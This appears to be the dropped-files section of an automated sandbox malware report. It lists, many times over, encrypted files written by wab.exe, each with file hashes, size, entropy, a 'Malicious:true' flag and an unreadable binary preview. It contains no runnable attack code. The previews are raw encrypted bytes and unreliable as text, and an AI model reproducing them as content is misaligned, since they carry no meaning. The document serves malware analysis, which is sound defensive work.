                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):192533
                                                                                          Entropy (8bit):7.998955378625458
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:Luw3DPWQotIh7xk+nlmnj+c+uB+s49BIm/pB1FBuVxfJMzGZuPe7AmOMd71UIdx2:CwbWxkO+nlmj+cPwKWBubfu6uIARMd1I
                                                                                          MD5:37FF0CC21B8EF0E9A5454667BFD8E4C8
                                                                                          SHA1:02A406D4EB6F9C9E76CD1AC67E113B3067CE9E9E
                                                                                          SHA-256:5F17D047662745CCBB6CC6954C3A8F5DD55719F49648B5CFA2A55FD559891443
                                                                                          SHA-512:5CCD2235C843AD3372AF4F4EE00F46D4EB466682096F571FA7268B58B375D4A8F425A807003F0C2477C3C8562BD83CD122FA67ADC7270A6109F3E5B77DFB5E2A
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):193598
                                                                                          Entropy (8bit):7.999096308292026
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:L0mAjS+P7Jzk7IbNlP/a/+QrQQ6C+p6b9dbEP9RFaHPe3ISqKhtZbcP04c0w7m/m:ohjS+P9k8NlPC/yQ/m6xdbERFemBqMpn
                                                                                          MD5:0E8127DA683715DBD907BCD0880C8BA6
                                                                                          SHA1:F590C26A21413B1333D0F32BEA6328D903B3159D
                                                                                          SHA-256:AEFDCB41ADA8BF8D6BF2901E2983C401927642006654FD0A32DD9C0F4C510782
                                                                                          SHA-512:8904510D562C1A9DC45999C7A9F69F5A5305F7A0D6B6F2382824727A0397B1701AAF28DC0BDFED2842B6F37D8F1449E7F7DE67EACE6B57801206A8DAB2242202
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
